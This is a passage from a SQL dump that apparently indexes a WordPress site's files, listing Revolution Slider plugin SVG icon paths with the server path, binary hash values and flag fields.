X%','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_camera_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_camera_24px.svg',0,'\rdm+>_MNt@T','\rdm+>_MNt@T','X DC7^=C P','',0,'?'),(' 7>b4PSq2','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_camera_alt_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_camera_alt_24px.svg',0,'Oa6Y%C','Oa6Y%C','l6ꏀ].rC\r;E','',0,'?'),('GQWc䮉I}8(','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_camera_front_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_camera_front_24px.svg',0,'NL6Wx','NL6Wx','9oxp(~8N=)','',0,'?'),('dqm:8w2','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_camera_rear_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_camera_rear_24px.svg',0,' |uUAKY',' |uUAKY',')N8jsٟjzvN=54Csq >','',0,'?'),(',fυRo3^','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_camera_roll_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_camera_roll_24px.svg',0,';z\r[Y~',';z\r[Y~','98\\t3Ŝ*`@6GWl,a','',0,'?'),('%ޖlK0<-@','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_center_focus_strong_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_center_focus_strong_24px.svg',0,'5FW~\'','5FW~\'',' XR+N|+= ,Y\r[\0ukT)','',0,'?'),('sZiF|\Z2j','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_center_focus_weak_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_center_focus_weak_24px.svg',0,'E~}!ow*J','E~}!ow*J','^V!\'emHp?e56','',0,'?'),('6r LX?S','',0,'?'),(' y2o$lju8','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_24px.svg',0,'zWܹ۠ ','zWܹ۠ ','4ڛ`vXM Yd\rfz','',0,'?'),('tw=̟\'3_^_','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_3_2_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_3_2_24px.svg',0,'|pX$Ȭo(N','|pX$Ȭo(N','C~_=<+y_P+Ma3O]i','',0,'?'),('%_2\r2k','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_5_4_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_5_4_24px.svg',0,'.\"bN','x>.\"bN','HG΃at/2Շ<9Zd','',0,'?'),('Uvq\"/,','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_details_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_details_24px.svg',0,' ^9/&s.-g',' ^9/&s.-g','ʴ])|g\Z\' ','',0,'?'),('A碶~(b\'k7','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_edit_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_edit_24px.svg',0,'905Hq^€\Z','905Hq^€\Z','vu;ׁO','\07>','4BYN4sa-1Ng5ZvbO0M','',0,'?'),('jxhypV&!','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_24px.svg',0,' m\',)|ɠfz',' m\',)|ɠfz','!gX E1M*PY;, ZI','',0,'?'),('u/LG qZG^','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_2_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_2_24px.svg',0,';5DT%Ⱥd.',';5DT%Ⱥd.','%nG&AxXSKz *M2j[-M|절','',0,'?'),('!Wxm\"~L\\n','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_3_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_3_24px.svg',0,' #P\\ڽ(D\r5','',0,'?'),('-.cX_S +G','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_9_plus_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_9_plus_24px.svg',0,'K HYR\0','K HYR\0','b}le8wr8EЂx ','',0,'?'),('TkT8DXd','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_b_and_w_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_b_and_w_24px.svg',0,'~pY{a®g%㿷','~pY{a®g%㿷','GcΣ#P 0̶/Wc7G]6=7b','',0,'?'),('lj5V\"Ͼh]','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_center_focus_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_center_focus_24px.svg',0,'qMR{E DR','qMR{E DR','וL4k:аO+Z&wAMD','',0,'?'),('GDw$~s','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_drama_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_drama_24px.svg',0,'x.2-S`ȮN','x.2-S`ȮN','n*Ƌ $1}}yP[A-.}=','',0,'?'),('R.E>3H','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_frames_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_frames_24px.svg',0,'%D[K(qe`/#','%D[K(qe`/#','^K]?4~*q^怲br','',0,'?'),(']syQ-','',0,'?'),('2i\n0m','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_flare_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_flare_24px.svg',0,'RBQ\'v','RBQ\'v','B|(擁e-khk 3','',0,'?'),('n E˖]%<])J#86@yn','',0,'?'),('^BU0y rc','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_grain_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_grain_24px.svg',0,'u8aF|֑','u8aF|֑','ʭy >Vyo8/v<','',0,'?'),('AGb[]^','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_grid_off_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_grid_off_24px.svg',0,'22OP2','22OP2','ހ9(WX=VQm ȅyd\Z6^','',0,'?'),('>Ɯ\\Y΢Pm','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_grid_on_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_grid_on_24px.svg',0,'t|n>+TN','t|n>+TN','\\KA/?Nc\"3 10>9\0y)[M','',0,'?'),('MؾIbznR','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_hdr_off_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_hdr_off_24px.svg',0,'|:\rh7G̣_','|:\rh7G̣_','%}@`=ig7?B`iCr?y','',0,'?'),('b<?31\r\\gX1','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_hdr_on_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_hdr_on_24px.svg',0,'y-+ e','y-+ e','+#\0S>(*fv ','',0,'?'),('N[>.`ړ%ǚݖ','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_hdr_strong_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_hdr_strong_24px.svg',0,'wjn>iz&G','wjn>iz&G','Ҁs<:y{CdK;] ,','',0,'?'),('Q)̋pZp*','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_hdr_weak_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_hdr_weak_24px.svg',0,'[bu','[bu','&+z4=oX?Nv','',0,'?'),('^zDG\"ܚ:','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_healing_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_healing_24px.svg',0,'d]=ӟ۷','d]=ӟ۷','Q11\0$<˟xCGKUIH','',0,'?'),('v*g1,y','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_image_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_image_24px.svg',0,'vːͦF18?','vːͦF18?','ɧbN=,g8r (MXjOA`s','',0,'?'),('ط6.-; ե[g','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_image_aspect_ratio_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_image_aspect_ratio_24px.svg',0,'{HSڳuf%5cO','{HSڳuf%5cO','<[ĭPn8~9 ~MU','',0,'?'),('_ ]o+,K','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_iso_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_iso_24px.svg',0,'-ʘȜFox','-ʘȜFox','H\'8W8ciA$bD G(;h','',0,'?'),('lr&C=u','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_landscape_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_landscape_24px.svg',0,'Dp\0)[Y','Dp\0)[Y','E酲.~I/tKޖDXy{E','',0,'?'),('4tt>\Z','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_leak_add_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_leak_add_24px.svg',0,']v\r\"\ZS8`~}\n',']v\r\"\ZS8`~}\n','R+gk ܢGU0(\Z','',0,'?'),('8w|a','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_leak_remove_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_leak_remove_24px.svg',0,'.$Η~[uJ$','.$Η~[uJ$','y1b\Z3*W?DCxqATȡ2D','',0,'?'),('v%tx>12','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_lens_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_lens_24px.svg',0,'^z9eP','^z9eP','Y~.*&/)᫰\\cdf*','',0,'?'),('9x/> L+s\"l','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_linked_camera_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_linked_camera_24px.svg',0,',Qɻ׆FB *u',',Qɻ׆FB *u',' X0csi[','',0,'?'),('o?\rKZ','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_24px.svg',0,'Q⃽Q}tF','Q⃽Q}tF','p ?+RטF\0S0Y`(+','',0,'?'),('[}e\'','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_3_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_3_24px.svg',0,'6e` ̝GԳ#/','6e` ̝GԳ#/','R#7JSJ QPgW4Ӂ','',0,'?'),('Q\"FIܢ','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_4_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_4_24px.svg',0,'a}x:O@','a}x:O@','5>8╃`Mj(ahPjs]t','',0,'?'),('vGo &\'\'3N?','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_5_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_5_24px.svg',0,'ٯϐmdHP','ٯϐmdHP',';k}߫\\vltWFCODsy','',0,'?'),('m08~`ryc ','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_6_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_6_24px.svg',0,'aow-/P=:','aow-/P=:','w GT®|<>/w','',0,'?'),('bbNSk','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_one_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_one_24px.svg',0,'nI4 B','nI4 B','y*32{aݨzÛ2J','',0,'?'),('pԣ*ra','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_two_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_two_24px.svg',0,'XyhBµ@*_','XyhBµ@*_','lJ+Vҹۋ2x«% PH.~+T','',0,'?'),(' A-W:zt','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_loupe_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_loupe_24px.svg',0,'t5ā+T#qC','t5ā+T#qC','Awa5Y*IL{8)R-o k','',0,'?'),('\0`p\rtT.b','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_monochrome_photos_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_monochrome_photos_24px.svg',0,'c΄>','c΄>','Dáq׷ <t-΋/*r','',0,'?'),('(?׹(CQ','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_movie_creation_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_movie_creation_24px.svg',0,'|>ed:U','|>ed:U','Xc\Z3V.M(9rLi','',0,'?'),('zxb\\A(Uk:f','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_movie_filter_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_movie_filter_24px.svg',0,'. !tTe,P','. !tTe,P','疁t0(%DE','',0,'?'),(') KWotds|&','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_music_note_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_music_note_24px.svg',0,'c]=h@','c]=h@','f/ Dj1ɾ3A8: ZRɸHI','',0,'?'),('=\\减M^BO','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_nature_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_nature_24px.svg',0,'2_I\\KV| ','2_I\\KV| ','KwUՌަY4w\0 \rJy','',0,'?'),('\Z#\n`ѵ!','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_nature_people_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_nature_people_24px.svg',0,'\\2Cw#','\\2Cw#','YƀY07<2ҩg!W`C|!GW','',0,'?'),('!`I3{','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_navigate_before_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_navigate_before_24px.svg',0,'իr) ','իr) ','^^Ղ{;O՝tHbBBO]U\nv','',0,'?'),('C\\X?','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_navigate_next_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_navigate_next_24px.svg',0,'/3\\-%C','/3\\-%C','Ɉ>5~D.51ōݿ@8KiRrK\'','',0,'?'),('ʬ-}G\0^l','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_palette_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_palette_24px.svg',0,' \n֎&\\',' \n֎&\\','KS_zݞV_^+','',0,'?'),('`+j~_3:jb','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_panorama_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_panorama_24px.svg',0,'EhWa\Z,','EhWa\Z,','!2|؈=OʌXwDŽ5:7]T܉','',0,'?'),('/|ڀ4b','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_panorama_fish_eye_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_panorama_fish_eye_24px.svg',0,'J~]ܪP-','J~]ܪP-',' =S-?vQlPcaT@Y_O\'','',0,'?'),('AQh\r\"؞','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_panorama_horizontal_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_panorama_horizontal_24px.svg',0,'d.c>YgD{','d.c>YgD{','|,OA o|e*+_\"_]0','',0,'?'),(',5sY(?*jf','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_panorama_vertical_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_panorama_vertical_24px.svg',0,'>2 \0JRx','>2 \0JRx','\ZFp)() *qW!,','',0,'?'),(' }\Z++{1%\\','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_panorama_wide_angle_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_panorama_wide_angle_24px.svg',0,'d\Z뢥z\"D','d\Z뢥z\"D','<~8n ܀\0>ˤo[s','',0,'?'),('}&*\rwc','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_24px.svg',0,'vːͦF18?','vːͦF18?','ɧbN=,g8r (MXjOA`s','',0,'?'),('ͳ)p-3iX.Ep','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_album_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_album_24px.svg',0,'iV&HlS>;İ}','iV&HlS>;İ}','sHx{$tt`!0f','',0,'?'),('ĵ}b칖%','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_camera_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_camera_24px.svg',0,'Oa6Y%C','Oa6Y%C','l6ꏀ].rC\r;E','',0,'?'),('3NbߜR}\0','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_filter_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_filter_24px.svg',0,'9oj+w','9oj+w',' b8\r^,us','',0,'?'),('m$MZyg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_library_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_library_24px.svg',0,'Ǻi\ZKC^\"l','Ǻi\ZKC^\"l','gcפY:Cz+:','',0,'?'),(' c ^9:Ů','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_size_select_actual_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_size_select_actual_24px.svg',0,'(zRun# d#q','(zRun# d#q','E}*MLR \0r̝','',0,'?'),('mmX2,p','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_size_select_large_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_size_select_large_24px.svg',0,'m.ĝ ;','m.ĝ ;','F;l!h8H\rهCb\0','',0,'?'),('>%ٵa','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_size_select_small_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_size_select_small_24px.svg',0,'ڠ\"_J:u\rߤ','ڠ\"_J:u\rߤ','vA_R\0\'}Kcmv&.$','',0,'?'),('-\nǪ9§5\0','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_picture_as_pdf_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_picture_as_pdf_24px.svg',0,'Pd=2*늬(\Z','Pd=2*늬(\Z','1d\\\\}oVi3 d0y','',0,'?'),('}Ea_A4“%)2','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_portrait_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_portrait_24px.svg',0,'(]-Gn\r/','(]-Gn\r/',',\0n6EeI98́a:4s< ?\n','',0,'?'),('G\'~I~O(Ǫ','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_remove_red_eye_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_remove_red_eye_24px.svg',0,'(dDN=!_2ك›','(dDN=!_2ك›','$7Q\rRt5,y}VOތr','',0,'?'),('\nd6X\"i','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_rotate_90_degrees_ccw_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_rotate_90_degrees_ccw_24px.svg',0,'B@vp k 0,','B@vp k 0,','1اs#vHp8ժNGU\'<','',0,'?'),('jX^fKI\'LU','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_rotate_left_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_rotate_left_24px.svg',0,'JtDHv>2=','JtDHv>2=','#}\08Q5yX 4 £Q.`f~ms','',0,'?'),('\\܀٠ri t','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_rotate_right_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_rotate_right_24px.svg',0,'wĨrw','wĨrw','8$B@bf_2','',0,'?'),('\0NUGJB','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_slideshow_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_slideshow_24px.svg',0,'$.d<]IDtO','$.d<]IDtO','3M]\'tbqh#E\r[2UF','',0,'?'),('w1B{\n-DI?','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_straighten_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_straighten_24px.svg',0,'~A\' ','~A\' ','Ujs1\n=,jh [#yB','',0,'?'),('N~j/s_','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_style_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_style_24px.svg',0,'R$ ԥ','R$ ԥ','@l1TzV4W[=r','',0,'?'),('dWM)g','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_switch_camera_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_switch_camera_24px.svg',0,'K|^9h,1S','K|^9h,1S','ܑrيyDoܚ2{\ZʮF','',0,'?'),('?&y8oD~P7[I','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_switch_video_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_switch_video_24px.svg',0,'@ rd\\yEIFh\0','@ rd\\yEIFh\0','΅ r \\/9Qixnu&','',0,'?'),('OBaOI','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_tag_faces_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_tag_faces_24px.svg',0,'l!qM+x k-','l!qM+x k-','\0ꧤ^vޕO͍rr0#t','',0,'?'),('/#^/\n#~u','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_texture_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_texture_24px.svg',0,' a/:~)IX',' a/:~)IX','I;,,D g]D.0\r9b','',0,'?'),('U<:-$vC+','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_timelapse_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_timelapse_24px.svg',0,'mɤ?Ʉ|!b','mɤ?Ʉ|!b','qxG.ݞ҈R[֜*qBA','',0,'?'),('īA\nD4','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_timer_10_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_timer_10_24px.svg',0,'v-/{{z˜\r','v-/{{z˜\r','&.0C]GUG u`','',0,'?'),('nko/]','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_timer_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_timer_24px.svg',0,'sk+vp','sk+vp','o\"%:tU3,uvH\nqc8[','',0,'?'),('J16a?\')88ry','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_timer_3_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_timer_3_24px.svg',0,'6C .\"\\j','6C .\"\\j','EtC֞nKJ΂C~uO\r@,','',0,'?'),('O:R?Gnm\\','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_timer_off_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_timer_off_24px.svg',0,'=ɫ/.Y•*','=ɫ/.Y•*','R͕&N؂VLXbxľ','',0,'?'),('9K:S','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_tonality_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_tonality_24px.svg',0,'AfΨv@:ɊF)','AfΨv@:ɊF)','%6@h&HFM(5yQϥ','',0,'?'),('8zƴUw','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_transform_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_transform_24px.svg',0,'I-h4k[','I-h4k[','m\Z<;47KGiQ7ԂQo\nm','',0,'?'),('<VɧG+ *','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_tune_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_tune_24px.svg',0,'l]\n%猠mWg.','l]\n%猠mWg.','U{ӚD)2b-:Ϝ','',0,'?'),('4&+)+7ޤr+q','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_view_comfy_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_view_comfy_24px.svg',0,'xº0f;','xº0f;','C\nC25T!/)2R0Z(3k`8_','',0,'?'),(']3I4qF& M','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_view_compact_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_view_compact_24px.svg',0,'^=y\no\Z8ˌ#Q','^=y\no\Z8ˌ#Q','yqj㧬9}<\0F6D֣jr_LȀ','',0,'?'),('-%\'Cy','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_vignette_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_vignette_24px.svg',0,'Bu Eubo>d','Bu Eubo>d','>߬GْmFSWł-','',0,'?'),(' slk\\lZ','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_wb_auto_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_wb_auto_24px.svg',0,'z\n.]YvP27','z\n.]YvP27','\"v=;B\0P` 뒝{p[Lb','',0,'?'),('>i7q \r˝\ZG D','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_wb_cloudy_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_wb_cloudy_24px.svg',0,'Hc$:kOY','Hc$:kOY','k^׷Xr- ?1]-o:?\0z;R','',0,'?'),('RX7_Cڪħ','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_wb_incandescent_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_wb_incandescent_24px.svg',0,'\"=.&գ','\"=.&գ','jOM:ΥqotG!$YU4f','',0,'?'),('/3Vэ7 